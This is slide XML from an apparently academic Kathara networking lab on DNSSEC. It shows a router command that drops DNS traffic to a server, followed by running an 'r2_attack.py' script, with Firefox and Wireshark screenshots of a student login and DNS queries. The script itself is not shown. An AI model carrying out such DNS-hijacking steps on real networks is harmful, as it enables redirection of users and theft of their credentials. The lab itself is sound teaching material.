                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>python3 r2_attack.py</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9A53139F-56AB-D933-E1E1-F2A577DD00AA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868024" y="2378845"/>
              <a:ext cx="671225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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="18" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F17246CA-7F7F-1D8F-B181-BD547AA64CA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="19" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D7C9CDD9-8EB6-44BA-5B0C-D99D4C26EBFB}"/>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20" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BE1B7C4F-E4D9-6B58-B5C7-AEAF12530CB3}"/>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21" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{768C1A4E-D9D4-7B7C-15DE-73397ADBA24D}"/>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8281598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B1D9B-8FF2-F122-A46E-3A1B71BB73E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9CF4F92-857D-FCBD-33A2-0ABE0551BAA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, software, Icona del computer">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD9306A5-DBB4-0AF6-EB42-E2BCD862BB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6914" y="1082911"/>
            <a:ext cx="9571511" cy="5436658"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E05C305-665E-4F19-E1D8-C8542A146599}"/>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0859B313-58C7-ABD2-7A93-4A8BC2789D7A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D7937BF-A883-274C-2322-8EA7C9FB4BA2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5838858" y="1868398"/>
            <a:ext cx="2782277" cy="1421068"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -104244"/>
              <a:gd name="adj2" fmla="val -63765"/>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type "www.uniroma3.it" as the URL in the search bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34100264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912FE-E8FD-8E8D-EB65-19DDE4CE755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B07756B-A9A6-EE9C-C93C-26D7CD7D01F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6E0D58D-9D6A-6257-4E0A-156B006273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4317" y="1259632"/>
            <a:ext cx="8823366" cy="5173699"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F29A766-F281-E2CB-D47E-21692879B8EC}"/>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00428F65-851B-7403-931B-9D8F6DA02CAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD38AF93-0ADB-B5DD-B105-282B6D9E27CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1476270" y="2696702"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 75021"/>
              <a:gd name="adj2" fmla="val 14704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enter the student's ID number</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A0C1B53-FC32-00AB-DAE6-8BC1CA82134C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6737775" y="3632866"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -99549"/>
              <a:gd name="adj2" fmla="val 7500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enter the student's password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB6B92D3-3523-A5B7-7C9E-732178F79F64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1581905" y="5232219"/>
            <a:ext cx="2782277" cy="732298"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 105752"/>
              <a:gd name="adj2" fmla="val -9526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access the student's reserved area</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="15914456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C0F111-F68D-2D95-E7BF-94910BEB1DCA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0" err="1"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, schermata, Software multimediale, software">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FA14B6D0-FE22-959A-CAD9-951B12FF9F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9904" y="1046853"/>
            <a:ext cx="9152191" cy="5406338"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E4193B0F-6E12-69BD-11E1-8F84634AE5A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2D6DF4AF-9EFF-9D3F-9F8C-37156446831D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E45F7619-1B77-1D92-842B-C93A2B9E4B37}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6953832" y="1972556"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -128632"/>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legitimate web server</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="27801190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886A8-CB5C-FE6A-EA15-04DB14E6678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24E885E-CC46-1513-8F56-900CE5234915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F036C88-16D6-BC8D-6FA3-27E08CF02EC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA59C82-FBBA-1D03-F92D-381BB9E99039}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Segnaposto contenuto 10" descr="Immagine che contiene testo, schermata, software, schermo">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB943616-EA36-BF8A-9151-22551B1F99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1612" y="1029964"/>
            <a:ext cx="10368775" cy="5351975"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E86F98A-952B-7C95-59F0-8D13CE670BD8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="9265137" y="2495071"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -128632"/>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DNS query packet</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D64C1456-CB4D-0132-7FAA-91396CB67069}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4745021" y="4074487"/>
            <a:ext cx="3104568" cy="746893"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108753"/>
              <a:gd name="adj2" fmla="val 3785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the name searched in the DNS query (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Qname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40313986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11DE66-CEE2-8B38-42CA-17FFBB32F89E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" dirty="0"/>
              <a:t>wireshark</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Segnaposto contenuto 6" descr="Immagine che contiene testo, software, Icona del computer, Pagina Web&#10;&#10;Il contenuto generato dall'IA potrebbe non essere corretto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAEC6B44-6275-A936-45C2-2649B1DC39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5992" y="1012979"/>
            <a:ext cx="10516408" cy="5428178"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AE1E710D-5894-8980-293F-92E738C4DE9C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="it-IT"/>
              <a:t>last update: Nov 2025</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49723B61-459B-2DC7-F54C-1913627E7FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" altLang="it-IT"/>
              <a:t>kathara – [ lab: basic-ipv4 ]</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" altLang="it-IT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{18396C9F-AD7D-7B46-A555-286AF7251359}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6633198" y="5095765"/>
            <a:ext cx="2782277" cy="749255"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -92719"/>
              <a:gd name="adj2" fmla="val -90593"/>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DNS response with legitimate IP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="AutoShape 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{56E5DAF3-EBAA-5373-D96C-96AD79EFE400}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8800123" y="3198503"/>
            <a:ext cx="2782277" cy="434594"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 19535"/>
